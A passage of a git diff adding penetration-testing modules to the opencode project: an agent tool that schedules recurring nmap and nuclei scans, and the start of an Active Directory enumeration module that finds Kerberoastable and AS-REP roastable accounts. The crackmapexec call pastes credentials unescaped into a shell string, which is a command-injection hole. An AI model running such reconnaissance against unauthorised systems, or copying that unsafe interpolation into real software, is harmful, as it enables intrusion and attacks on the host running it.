+    await MonitorStorage.updateMonitor(monitorID, { status: "active" })
+    await scheduleMonitor({ ...monitor, status: "active" })
+
+    Bus.publish(MonitoringEvents.MonitorResumed, { monitorID })
+  }
+
+  /**
+   * Cancel and disable a monitor.
+   *
+   * @param monitorID - Monitor ID
+   */
+  export async function cancelMonitor(monitorID: string): Promise<void> {
+    const s = await state()
+    const task = s.tasks.get(monitorID)
+    if (task) {
+      task.cancel()
+      s.tasks.delete(monitorID)
+    }
+
+    await MonitorStorage.updateMonitor(monitorID, { status: "disabled" })
+
+    Bus.publish(MonitoringEvents.MonitorCancelled, { monitorID })
+  }
+
+  /**
+   * Trigger an immediate run of a monitor.
+   *
+   * @param monitorID - Monitor ID
+   * @returns Completed run record
+   */
+  export async function triggerNow(monitorID: string): Promise<MonitorRun> {
+    const monitor = await MonitorStorage.getMonitor(monitorID)
+    if (!monitor) {
+      throw new Error(`Monitor not found: ${monitorID}`)
+    }
+
+    return MonitorRunner.execute(monitor)
+  }
+
+  /**
+   * Get scheduler status.
+   *
+   * @returns Status summary
+   */
+  export async function status(): Promise<{
+    scheduledCount: number
+    runningCount: number
+    tasks: Array<{ monitorID: string; nextRun: number }>
+  }> {
+    const s = await state()
+    return {
+      scheduledCount: s.tasks.size,
+      runningCount: s.running.size,
+      tasks: Array.from(s.tasks.values()).map((t) => ({
+        monitorID: t.monitorID,
+        nextRun: t.nextRun,
+      })),
+    }
+  }
+
+  /**
+   * Check if a monitor is currently running.
+   *
+   * @param monitorID - Monitor ID
+   * @returns true if running
+   */
+  export async function isRunning(monitorID: string): Promise<boolean> {
+    const s = await state()
+    return s.running.has(monitorID)
+  }
+
+  /**
+   * Get the next scheduled run time for a monitor.
+   *
+   * @param monitorID - Monitor ID
+   * @returns Next run timestamp or null if not scheduled
+   */
+  export async function getNextRun(monitorID: string): Promise<number | null> {
+    const s = await state()
+    const task = s.tasks.get(monitorID)
+    return task?.nextRun ?? null
+  }
+}
diff --git a/packages/opencode/src/pentest/monitoring/storage.ts b/packages/opencode/src/pentest/monitoring/storage.ts
new file mode 100644
index 00000000000..472778fbf20
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/storage.ts
@@ -0,0 +1,245 @@
+/**
+ * @fileoverview Monitor Storage
+ *
+ * Storage helpers for monitor configuration and run persistence.
+ *
+ * @module pentest/monitoring/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { Bus } from "../../bus"
+import type { Monitor, MonitorRun } from "./types"
+import { MonitoringEvents } from "./events"
+
+/**
+ * Generate a unique monitor ID.
+ */
+function generateMonitorId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `mon_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique run ID.
+ */
+export function generateRunId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `run_${timestamp}_${random}`
+}
+
+/**
+ * Monitor storage namespace.
+ */
+export namespace MonitorStorage {
+  /**
+   * Create a new monitor.
+   *
+   * @param input - Monitor configuration (without id, createdAt, runCount)
+   * @returns Created monitor with generated ID
+   */
+  export async function createMonitor(
+    input: Omit<Monitor, "id" | "createdAt" | "runCount" | "status"> & { status?: Monitor["status"] }
+  ): Promise<Monitor> {
+    const id = generateMonitorId()
+    const monitor: Monitor = {
+      ...input,
+      id,
+      status: input.status ?? "active",
+      createdAt: Date.now(),
+      runCount: 0,
+    }
+
+    await Storage.write(["pentest", "monitoring", "monitors", id], monitor)
+
+    Bus.publish(MonitoringEvents.MonitorCreated, {
+      monitorID: id,
+      name: monitor.name,
+      targets: monitor.targets,
+    })
+
+    return monitor
+  }
+
+  /**
+   * Get a monitor by ID.
+   *
+   * @param id - Monitor ID
+   * @returns Monitor or null if not found
+   */
+  export async function getMonitor(id: string): Promise<Monitor | null> {
+    try {
+      return await Storage.read<Monitor>(["pentest", "monitoring", "monitors", id])
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Update a monitor.
+   *
+   * @param id - Monitor ID
+   * @param updates - Fields to update
+   * @returns Updated monitor or null if not found
+   */
+  export async function updateMonitor(
+    id: string,
+    updates: Partial<Omit<Monitor, "id" | "createdAt">>
+  ): Promise<Monitor | null> {
+    const existing = await getMonitor(id)
+    if (!existing) return null
+
+    const updated: Monitor = {
+      ...existing,
+      ...updates,
+      updatedAt: Date.now(),
+    }
+
+    await Storage.write(["pentest", "monitoring", "monitors", id], updated)
+
+    Bus.publish(MonitoringEvents.MonitorUpdated, {
+      monitorID: id,
+      changes: Object.keys(updates),
+    })
+
+    return updated
+  }
+
+  /**
+   * Delete a monitor.
+   *
+   * @param id - Monitor ID
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteMonitor(id: string): Promise<boolean> {
+    const existing = await getMonitor(id)
+    if (!existing) return false
+
+    await Storage.remove(["pentest", "monitoring", "monitors", id])
+
+    Bus.publish(MonitoringEvents.MonitorDeleted, { monitorID: id })
+
+    return true
+  }
+
+  /**
+   * List all monitors.
+   *
+   * @param filters - Optional filters
+   * @returns Array of monitors, sorted by creation time (newest first)
+   */
+  export async function listMonitors(filters?: {
+    sessionID?: string
+    status?: Monitor["status"]
+  }): Promise<Monitor[]> {
+    const keys = await Storage.list(["pentest", "monitoring", "monitors"])
+    const monitors: Monitor[] = []
+
+    for (const key of keys) {
+      try {
+        const monitor = await Storage.read<Monitor>(key)
+
+        if (filters?.sessionID && monitor.sessionID !== filters.sessionID) continue
+        if (filters?.status && monitor.status !== filters.status) continue
+
+        monitors.push(monitor)
+      } catch {
+        // Skip invalid entries
+      }
+    }
+
+    return monitors.sort((a, b) => b.createdAt - a.createdAt)
+  }
+
+  /**
+   * Save a monitor run.
+   *
+   * @param run - Run record to save
+   */
+  export async function saveRun(run: MonitorRun): Promise<void> {
+    await Storage.write(["pentest", "monitoring", "runs", run.monitorID, run.id], run)
+  }
+
+  /**
+   * Get a monitor run.
+   *
+   * @param monitorID - Monitor ID
+   * @param runID - Run ID
+   * @returns Run or null if not found
+   */
+  export async function getRun(monitorID: string, runID: string): Promise<MonitorRun | null> {
+    try {
+      return await Storage.read<MonitorRun>(["pentest", "monitoring", "runs", monitorID, runID])
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List runs for a monitor.
+   *
+   * @param monitorID - Monitor ID
+   * @param options - Optional filters and limits
+   * @returns Array of runs, sorted by run number (newest first)
+   */
+  export async function listRuns(
+    monitorID: string,
+    options?: { limit?: number; status?: MonitorRun["status"] }
+  ): Promise<MonitorRun[]> {
+    const keys = await Storage.list(["pentest", "monitoring", "runs", monitorID])
+    const runs: MonitorRun[] = []
+
+    for (const key of keys) {
+      try {
+        const run = await Storage.read<MonitorRun>(key)
+
+        if (options?.status && run.status !== options.status) continue
+
+        runs.push(run)
+      } catch {
+        // Skip invalid entries
+      }
+    }
+
+    // Sort by run number descending
+    runs.sort((a, b) => b.runNumber - a.runNumber)
+
+    if (options?.limit) {
+      return runs.slice(0, options.limit)
+    }
+
+    return runs
+  }
+
+  /**
+   * Get the most recent completed run for a monitor.
+   *
+   * @param monitorID - Monitor ID
+   * @returns Most recent completed run or null
+   */
+  export async function getLastCompletedRun(monitorID: string): Promise<MonitorRun | null> {
+    const runs = await listRuns(monitorID, { status: "completed", limit: 1 })
+    return runs[0] || null
+  }
+}
+
+// Re-export convenience functions
+export const {
+  createMonitor,
+  getMonitor,
+  updateMonitor,
+  deleteMonitor,
+  listMonitors,
+  saveRun,
+  getRun,
+  listRuns,
+  getLastCompletedRun,
+} = MonitorStorage
diff --git a/packages/opencode/src/pentest/monitoring/tool.ts b/packages/opencode/src/pentest/monitoring/tool.ts
new file mode 100644
index 00000000000..e0ca602b7aa
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/tool.ts
@@ -0,0 +1,336 @@
+/**
+ * @fileoverview Monitor Tool
+ *
+ * Agent tool for managing continuous monitors.
+ *
+ * @module pentest/monitoring/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { Log } from "../../util/log"
+import { Scheduler } from "./scheduler"
+import { MonitorStorage } from "./storage"
+import type { Monitor, MonitorToolConfig, Schedule } from "./types"
+
+const log = Log.create({ service: "pentest.monitoring.tool" })
+
+/**
+ * Monitor management tool for LLM agents.
+ */
+export const MonitorTool = Tool.define("monitor", async () => {
+  return {
+    description: `Create and manage continuous security monitors.
+
+Monitors run security scans on a schedule and alert when new vulnerabilities are found.
+
+ACTIONS:
+- create: Create a new monitor for scheduled security scans
+- list: List all monitors
+- get: Get details of a specific monitor
+- pause: Pause a running monitor
+- resume: Resume a paused monitor
+- delete: Delete a monitor
+- trigger: Trigger an immediate scan
+- status: Get scheduler status
+
+EXAMPLES:
+Create a daily nmap scan:
+  action="create", name="Daily Port Scan", targets=["192.168.1.1"],
+  tools=[{tool:"nmap"}], scheduleType="interval", intervalMs=86400000
+
+Create a nuclei scan every 6 hours:
+  action="create", name="Vuln Scan", targets=["https://example.com"],
+  tools=[{tool:"nuclei", args:"-t cves/"}], scheduleType="cron", cronExpression="0 */6 * * *"
+
+Trigger immediate run:
+  action="trigger", monitorID="mon_abc123"`,
+
+    parameters: z.object({
+      action: z.enum(["create", "list", "get", "pause", "resume", "delete", "trigger", "status"]),
+      monitorID: z
+        .string()
+        .optional()
+        .describe("Monitor ID for get/pause/resume/delete/trigger actions"),
+      name: z.string().optional().describe("Monitor name for create action"),
+      description: z.string().optional().describe("Monitor description"),
+      targets: z.array(z.string()).optional().describe("Targets to scan (IPs, hostnames, URLs)"),
+      tools: z
+        .array(
+          z.object({
+            tool: z.string().describe("Tool name (nmap, nuclei, nikto, etc.)"),
+            args: z.string().optional().describe("Tool-specific arguments"),
+            timeout: z.number().optional().describe("Timeout in milliseconds"),
+            createFindings: z.boolean().optional().describe("Create findings from results"),
+          })
+        )
+        .optional()
+        .describe("Tools to run during each scan"),
+      scheduleType: z.enum(["interval", "cron"]).optional().describe("Schedule type"),
+      intervalMs: z.number().optional().describe("Interval in milliseconds for interval schedule"),
+      cronExpression: z.string().optional().describe("Cron expression for cron schedule"),
+      alertMinSeverity: z
+        .enum(["info", "low", "medium", "high", "critical"])
+        .optional()
+        .describe("Minimum severity to trigger alerts"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "create": {
+          if (!params.name || !params.targets || !params.tools || !params.scheduleType) {
+            return {
+              title: "Missing required parameters",
+              output:
+                "Required for create: name, targets, tools, scheduleType\n\n" +
+                "For interval: scheduleType='interval', intervalMs=<milliseconds>\n" +
+                "For cron: scheduleType='cron', cronExpression='<cron expression>'",
+              metadata: { action: params.action, status: "error" },
+            }
+          }
+
+          let schedule: Schedule
+          if (params.scheduleType === "cron") {
+            if (!params.cronExpression) {
+              return {
+                title: "Missing cron expression",
+                output: "cronExpression is required for cron schedule type",
+                metadata: { action: params.action, status: "error" },
+              }
+            }
+            schedule = { type: "cron", expression: params.cronExpression }
+          } else {
+            if (!params.intervalMs) {
+              return {
+                title: "Missing interval",
+                output: "intervalMs is required for interval schedule type",
+                metadata: { action: params.action, status: "error" },
+              }
+            }
+            schedule = { type: "interval", intervalMs: params.intervalMs, maxRuns: 0 }
+          }
+
+          const monitor = await MonitorStorage.createMonitor({
+            name: params.name,
+            description: params.description,
+            sessionID: ctx.sessionID,
+            targets: params.targets,
+            tools: params.tools as MonitorToolConfig[],
+            schedule,
+            alerts: {
+              enabled: true,
+              minSeverity: params.alertMinSeverity || "low",
+              newFindingsOnly: true,
+              channels: ["bus"],
+              cooldownMs: 300_000,
+            },
+          })
+
+          await Scheduler.scheduleMonitor(monitor)
+
+          const nextRunStr = monitor.nextRunAt
+            ? new Date(monitor.nextRunAt).toISOString()
+            : "now"
+
+          return {
+            title: `Monitor created: ${monitor.name}`,
+            output:
+              `Monitor ID: ${monitor.id}\n` +
+              `Name: ${monitor.name}\n` +
+              `Targets: ${monitor.targets.join(", ")}\n` +
+              `Tools: ${monitor.tools.map((t) => t.tool).join(", ")}\n` +
+              `Schedule: ${params.scheduleType === "cron" ? params.cronExpression : `${params.intervalMs}ms`}\n` +
+              `Next run: ${nextRunStr}`,
+            metadata: { action: "create", monitorID: monitor.id, status: "success" } as Record<string, unknown>,
+          }
+        }
+
+        case "list": {
+          const monitors = await MonitorStorage.listMonitors()
+
+          if (monitors.length === 0) {
+            return {
+              title: "No monitors found",
+              output: "No monitors have been created yet.\n\nUse action='create' to create a monitor.",
+              metadata: { action: "list", count: 0 } as Record<string, unknown>,
+            }
+          }
+
+          const output = monitors
+            .map((m) => {
+              const nextRun = m.nextRunAt ? new Date(m.nextRunAt).toISOString() : "N/A"
+              return (
+                `${m.id}: ${m.name}\n` +
+                `  Status: ${m.status}\n` +
+                `  Targets: ${m.targets.length}\n` +
+                `  Runs: ${m.runCount}\n` +
+                `  Next: ${nextRun}`
+              )
+            })
+            .join("\n\n")
+
+          return {
+            title: `${monitors.length} monitor(s) found`,
+            output,
+            metadata: { action: "list", count: monitors.length } as Record<string, unknown>,
+          }
+        }
+
+        case "get": {
+          if (!params.monitorID) {
+            return {
+              title: "Missing monitorID",
+              output: "monitorID is required for get action",
+              metadata: { action: "get", status: "error" } as Record<string, unknown>,
+            }
+          }
+
+          const monitor = await MonitorStorage.getMonitor(params.monitorID)
+          if (!monitor) {
+            return {
+              title: "Monitor not found",
+              output: `No monitor with ID: ${params.monitorID}`,
+              metadata: { action: "get", status: "not_found" } as Record<string, unknown>,
+            }
+          }
+
+          const runs = await MonitorStorage.listRuns(monitor.id, { limit: 5 })
+          const recentRuns = runs
+            .map(
+              (r) =>
+                `  Run ${r.runNumber}: ${r.status} - ${r.findingIDs.length} findings, ${r.newFindingIDs.length} new`
+            )
+            .join("\n")
+
+          return {
+            title: `Monitor: ${monitor.name}`,
+            output:
+              `ID: ${monitor.id}\n` +
+              `Name: ${monitor.name}\n` +
+              `Status: ${monitor.status}\n` +
+              `Targets: ${monitor.targets.join(", ")}\n` +
+              `Tools: ${monitor.tools.map((t) => t.tool).join(", ")}\n` +
+              `Schedule: ${monitor.schedule.type === "cron" ? monitor.schedule.expression : `${monitor.schedule.intervalMs}ms`}\n` +
+              `Total runs: ${monitor.runCount}\n` +
+              `Last run: ${monitor.lastRunAt ? new Date(monitor.lastRunAt).toISOString() : "Never"}\n` +
+              `Next run: ${monitor.nextRunAt ? new Date(monitor.nextRunAt).toISOString() : "N/A"}\n` +
+              `\nRecent runs:\n${recentRuns || "  No runs yet"}`,
+            metadata: { action: "get", monitorID: monitor.id } as Record<string, unknown>,
+          }
+        }
+
+        case "pause": {
+          if (!params.monitorID) {
+            return {
+              title: "Missing monitorID",
+              output: "monitorID is required",
+              metadata: { action: "pause", status: "error" } as Record<string, unknown>,
+            }
+          }
+
+          await Scheduler.pauseMonitor(params.monitorID)
+
+          return {
+            title: "Monitor paused",
+            output: `Monitor ${params.monitorID} has been paused`,
+            metadata: { action: "pause", monitorID: params.monitorID } as Record<string, unknown>,
+          }
+        }
+
+        case "resume": {
+          if (!params.monitorID) {
+            return {
+              title: "Missing monitorID",
+              output: "monitorID is required",
+              metadata: { action: "resume", status: "error" } as Record<string, unknown>,
+            }
+          }
+
+          await Scheduler.resumeMonitor(params.monitorID)
+
+          return {
+            title: "Monitor resumed",
+            output: `Monitor ${params.monitorID} has been resumed`,
+            metadata: { action: "resume", monitorID: params.monitorID } as Record<string, unknown>,
+          }
+        }
+
+        case "delete": {
+          if (!params.monitorID) {
+            return {
+              title: "Missing monitorID",
+              output: "monitorID is required",
+              metadata: { action: "delete", status: "error" } as Record<string, unknown>,
+            }
+          }
+
+          await Scheduler.cancelMonitor(params.monitorID)
+          await MonitorStorage.deleteMonitor(params.monitorID)
+
+          return {
+            title: "Monitor deleted",
+            output: `Monitor ${params.monitorID} has been deleted`,
+            metadata: { action: "delete", monitorID: params.monitorID } as Record<string, unknown>,
+          }
+        }
+
+        case "trigger": {
+          if (!params.monitorID) {
+            return {
+              title: "Missing monitorID",
+              output: "monitorID is required",
+              metadata: { action: "trigger", status: "error" } as Record<string, unknown>,
+            }
+          }
+
+          try {
+            const run = await Scheduler.triggerNow(params.monitorID)
+
+            return {
+              title: `Monitor triggered: Run ${run.runNumber}`,
+              output:
+                `Run ID: ${run.id}\n` +
+                `Status: ${run.status}\n` +
+                `Duration: ${run.endTime ? run.endTime - run.startTime : 0}ms\n` +
+                `Scans: ${run.scanIDs.length}\n` +
+                `Findings: ${run.findingIDs.length}\n` +
+                `New: ${run.newFindingIDs.length}\n` +
+                `Resolved: ${run.resolvedFindingIDs.length}`,
+              metadata: { action: "trigger", monitorID: params.monitorID, runID: run.id, status: "success" } as Record<string, unknown>,
+            }
+          } catch (error) {
+            return {
+              title: "Trigger failed",
+              output: `Failed to trigger monitor: ${error instanceof Error ? error.message : String(error)}`,
+              metadata: { action: "trigger", monitorID: params.monitorID, status: "error" } as Record<string, unknown>,
+            }
+          }
+        }
+
+        case "status": {
+          const schedulerStatus = await Scheduler.status()
+
+          const tasksOutput = schedulerStatus.tasks
+            .map((t) => `  ${t.monitorID}: next run ${new Date(t.nextRun).toISOString()}`)
+            .join("\n")
+
+          return {
+            title: "Scheduler Status",
+            output:
+              `Scheduled monitors: ${schedulerStatus.scheduledCount}\n` +
+              `Currently running: ${schedulerStatus.runningCount}\n` +
+              `\nScheduled tasks:\n${tasksOutput || "  None"}`,
+            metadata: { action: "status", scheduledCount: schedulerStatus.scheduledCount, runningCount: schedulerStatus.runningCount, tasks: schedulerStatus.tasks } as Record<string, unknown>,
+          }
+        }
+
+        default:
+          return {
+            title: "Unknown action",
+            output: `Unknown action: ${params.action}\n\nValid actions: create, list, get, pause, resume, delete, trigger, status`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
diff --git a/packages/opencode/src/pentest/monitoring/types.ts b/packages/opencode/src/pentest/monitoring/types.ts
new file mode 100644
index 00000000000..38044415cd8
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/types.ts
@@ -0,0 +1,225 @@
+/**
+ * @fileoverview Monitoring Types
+ *
+ * Type definitions for continuous security monitoring.
+ *
+ * @module pentest/monitoring/types
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+
+/**
+ * Schedule type discriminator.
+ */
+export const ScheduleType = z.enum(["interval", "cron"])
+export type ScheduleType = z.infer<typeof ScheduleType>
+
+/**
+ * Interval-based schedule configuration.
+ */
+export const IntervalSchedule = z.object({
+  type: z.literal("interval"),
+  /** Interval in milliseconds (minimum 60 seconds) */
+  intervalMs: z.number().min(60_000),
+  /** Maximum runs (0 = unlimited) */
+  maxRuns: z.number().default(0),
+})
+export type IntervalSchedule = z.infer<typeof IntervalSchedule>
+
+/**
+ * Cron-based schedule configuration.
+ * Uses standard 5-field cron: minute hour dayOfMonth month dayOfWeek
+ */
+export const CronSchedule = z.object({
+  type: z.literal("cron"),
+  /** Cron expression (e.g., "0 0 * * *" for daily at midnight) */
+  expression: z.string(),
+  /** Timezone for cron evaluation */
+  timezone: z.string().optional(),
+})
+export type CronSchedule = z.infer<typeof CronSchedule>
+
+/**
+ * Union of schedule types.
+ */
+export const Schedule = z.discriminatedUnion("type", [IntervalSchedule, CronSchedule])
+export type Schedule = z.infer<typeof Schedule>
+
+/**
+ * Tool configuration for a monitor.
+ */
+export const MonitorToolConfig = z.object({
+  /** Tool name (e.g., "nmap", "nuclei", "nikto") */
+  tool: z.string(),
+  /** Tool-specific arguments */
+  args: z.string().optional(),
+  /** Timeout in milliseconds */
+  timeout: z.number().optional(),
+  /** Whether to create findings from this tool's output */
+  createFindings: z.boolean().default(true),
+})
+export type MonitorToolConfig = z.infer<typeof MonitorToolConfig>
+
+/**
+ * Monitor status.
+ */
+export const MonitorStatus = z.enum(["active", "paused", "disabled", "error"])
+export type MonitorStatus = z.infer<typeof MonitorStatus>
+
+/**
+ * Alert channel types.
+ */
+export const AlertChannel = z.enum(["bus", "log", "webhook"])
+export type AlertChannel = z.infer<typeof AlertChannel>
+
+/**
+ * Alert configuration for a monitor.
+ */
+export const AlertConfig = z.object({
+  /** Enable alerts */
+  enabled: z.boolean().default(true),
+  /** Minimum severity to trigger alerts */
+  minSeverity: PentestTypes.Severity.default("low"),
+  /** Alert on new findings only (vs all findings) */
+  newFindingsOnly: z.boolean().default(true),
+  /** Alert channels */
+  channels: z.array(AlertChannel).default(["bus"]),
+  /** Webhook URL for webhook channel */
+  webhookUrl: z.string().url().optional(),
+  /** Cooldown period in milliseconds to prevent spam */
+  cooldownMs: z.number().default(300_000),
+})
+export type AlertConfig = z.infer<typeof AlertConfig>
+
+/**
+ * Complete monitor configuration.
+ */
+export const Monitor = z.object({
+  /** Unique monitor ID */
+  id: z.string(),
+  /** Human-readable name */
+  name: z.string(),
+  /** Description of what this monitor watches */
+  description: z.string().optional(),
+  /** Session ID this monitor belongs to */
+  sessionID: z.string(),
+  /** Targets to scan (IPs, hostnames, URLs) */
+  targets: z.array(z.string()).min(1),
+  /** Tools to run on each scan */
+  tools: z.array(MonitorToolConfig).min(1),
+  /** Schedule configuration */
+  schedule: Schedule,
+  /** Current status */
+  status: MonitorStatus.default("active"),
+  /** Alert configuration */
+  alerts: AlertConfig.default({
+    enabled: true,
+    minSeverity: "low",
+    newFindingsOnly: true,
+    channels: ["bus"],
+    cooldownMs: 300_000,
+  }),
+  /** Tags for organization */
+  tags: z.array(z.string()).optional(),
+  /** Creation timestamp */
+  createdAt: z.number(),
+  /** Last update timestamp */
+  updatedAt: z.number().optional(),
+  /** Last run timestamp */
+  lastRunAt: z.number().optional(),
+  /** Next scheduled run timestamp */
+  nextRunAt: z.number().optional(),
+  /** Total number of runs */
+  runCount: z.number().default(0),
+  /** Last error message if status is "error" */
+  lastError: z.string().optional(),
+})
+export type Monitor = z.infer<typeof Monitor>
+
+/**
+ * Monitor run status.
+ */
+export const MonitorRunStatus = z.enum(["running", "completed", "failed", "cancelled"])
+export type MonitorRunStatus = z.infer<typeof MonitorRunStatus>
+
+/**
+ * Monitor run record.
+ */
+export const MonitorRun = z.object({
+  /** Unique run ID */
+  id: z.string(),
+  /** Monitor ID */
+  monitorID: z.string(),
+  /** Session ID */
+  sessionID: z.string(),
+  /** Run start time */
+  startTime: z.number(),
+  /** Run end time */
+  endTime: z.number().optional(),
+  /** Run status */
+  status: MonitorRunStatus,
+  /** Scan IDs created during this run */
+  scanIDs: z.array(z.string()),
+  /** Finding IDs created during this run */
+  findingIDs: z.array(z.string()),
+  /** New findings discovered (compared to previous run) */
+  newFindingIDs: z.array(z.string()),
+  /** Resolved findings (present in previous run but not this one) */
+  resolvedFindingIDs: z.array(z.string()),
+  /** Error message if failed */
+  error: z.string().optional(),
+  /** Run number */
+  runNumber: z.number(),
+})
+export type MonitorRun = z.infer<typeof MonitorRun>
+
+/**
+ * Finding fingerprint for diff detection.
+ * Used to compare findings across runs.
+ */
+export const FindingFingerprint = z.object({
+  /** Hash of finding key attributes */
+  hash: z.string(),
+  /** Finding ID */
+  findingID: z.string(),
+  /** Key attributes used for comparison */
+  attributes: z.object({
+    title: z.string(),
+    target: z.string(),
+    port: z.number().optional(),
+    service: z.string().optional(),
+    severity: PentestTypes.Severity,
+  }),
+})
+export type FindingFingerprint = z.infer<typeof FindingFingerprint>
+
+/**
+ * Diff result between two runs.
+ */
+export const DiffResult = z.object({
+  /** New finding IDs */
+  newFindings: z.array(z.string()),
+  /** Resolved finding IDs */
+  resolvedFindings: z.array(z.string()),
+  /** Unchanged finding IDs */
+  unchangedFindings: z.array(z.string()),
+  /** Total findings in previous run */
+  totalPrevious: z.number(),
+  /** Total findings in current run */
+  totalCurrent: z.number(),
+})
+export type DiffResult = z.infer<typeof DiffResult>
+
+/**
+ * Severity summary for alerts.
+ */
+export const SeveritySummary = z.object({
+  critical: z.number(),
+  high: z.number(),
+  medium: z.number(),
+  low: z.number(),
+  info: z.number(),
+  total: z.number(),
+})
+export type SeveritySummary = z.infer<typeof SeveritySummary>
diff --git a/packages/opencode/src/pentest/netscan/ad/enumeration.ts b/packages/opencode/src/pentest/netscan/ad/enumeration.ts
new file mode 100644
index 00000000000..daa948bc44b
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ad/enumeration.ts
@@ -0,0 +1,364 @@
+/**
+ * @fileoverview Active Directory Enumeration
+ *
+ * Enumerate AD domain information, users, groups, and computers.
+ *
+ * @module pentest/netscan/ad/enumeration
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { LDAPEnum } from "../ldap/enum"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ad.enumeration" })
+
+/**
+ * AD enumeration options.
+ */
+export interface ADEnumOptions {
+  dc: string
+  domain: string
+  auth: {
+    username: string
+    password: string
+  }
+  timeout?: number
+  ssl?: boolean
+}
+
+/**
+ * AD enumeration result.
+ */
+export interface ADEnumResult {
+  domain: NetScanTypes.ADDomain
+  users: NetScanTypes.ADUser[]
+  groups: NetScanTypes.ADGroup[]
+  computers: NetScanTypes.ADComputer[]
+  findings: string[]
+}
+
+/**
+ * AD enumeration namespace.
+ */
+export namespace ADEnumeration {
+  /**
+   * Get domain information.
+   */
+  export async function getDomainInfo(
+    dc: string,
+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean } = {}
+  ): Promise<NetScanTypes.ADDomain> {
+    const timeout = options.timeout || 60000
+
+    log.info("Getting domain information", { dc, domain: auth.domain })
+
+    // Get base domain info via LDAP
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    const ldapResult = await LDAPEnum.enumerate(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout,
+    })
+
+    // Find domain controllers
+    const domainControllers = ldapResult.computers
+      .filter((c) => c.isDomainController)
+      .map((c) => c.dnsHostname || c.samAccountName)
+
+    // Get additional info via netexec/crackmapexec if available
+    let functionalLevel: NetScanTypes.ADFunctionalLevel =
+      (ldapResult.domainInfo?.functionalLevel as NetScanTypes.ADFunctionalLevel) || "unknown"
+    let domainSID = ""
+    let forestName = auth.domain
+
+    try {
+      const { stdout } = await execAsync(
+        `crackmapexec smb ${dc} -u '${auth.username}' -p '${auth.password}' -d '${auth.domain}' 2>&1`,
+        { timeout: 15000 }
+      )
+
+      // Extract domain SID if visible
+      const sidMatch = stdout.match(/S-1-5-21-\d+-\d+-\d+/)
+      if (sidMatch) {
+        domainSID = sidMatch[0]
+      }
+    } catch {
+      // CME not available
+    }
+
+    const domain: NetScanTypes.ADDomain = {
+      name: auth.domain,
+      netbios: auth.domain.split(".")[0].toUpperCase(),
+      domainSID,
+      forestName,
+      functionalLevel,
+      domainControllers,
+      trusts: [],
+    }
+
+    log.info("Domain info retrieved", {
+      name: domain.name,
+      dcCount: domainControllers.length,
+    })
+
+    return domain
+  }
+
+  /**
+   * Enumerate all domain users.
+   */
+  export async function getUsers(
+    dc: string,
+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean; filter?: string } = {}
+  ): Promise<NetScanTypes.ADUser[]> {
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    log.info("Enumerating domain users", { dc, domain: auth.domain })
+
+    const users = await LDAPEnum.enumerateUsers(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout: options.timeout,
+    })
+
+    log.info("User enumeration complete", { count: users.length })
+
+    return users
+  }
+
+  /**
+   * Enumerate all domain groups.
+   */
+  export async function getGroups(
+    dc: string,
+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean } = {}
+  ): Promise<NetScanTypes.ADGroup[]> {
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    log.info("Enumerating domain groups", { dc, domain: auth.domain })
+
+    const groups = await LDAPEnum.enumerateGroups(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout: options.timeout,
+    })
+
+    log.info("Group enumeration complete", { count: groups.length })
+
+    return groups
+  }
+
+  /**
+   * Enumerate all domain computers.
+   */
+  export async function getComputers(
+    dc: string,
+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean } = {}
+  ): Promise<NetScanTypes.ADComputer[]> {
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    log.info("Enumerating domain computers", { dc, domain: auth.domain })
+
+    const computers = await LDAPEnum.enumerateComputers(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout: options.timeout,
+    })
+
+    log.info("Computer enumeration complete", { count: computers.length })
+
+    return computers
+  }
+
+  /**
+   * Find Kerberoastable accounts.
+   */
+  export async function getKerberoastable(
+    dc: string,
+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean } = {}
+  ): Promise<NetScanTypes.ADUser[]> {
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    log.info("Finding Kerberoastable accounts", { dc, domain: auth.domain })
+
+    const users = await LDAPEnum.findKerberoastable(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout: options.timeout,
+    })
+
+    log.info("Kerberoastable search complete", { count: users.length })
+
+    return users
+  }
+
+  /**
+   * Find AS-REP roastable accounts.
+   */
+  export async function getASRepRoastable(
+    dc: string,
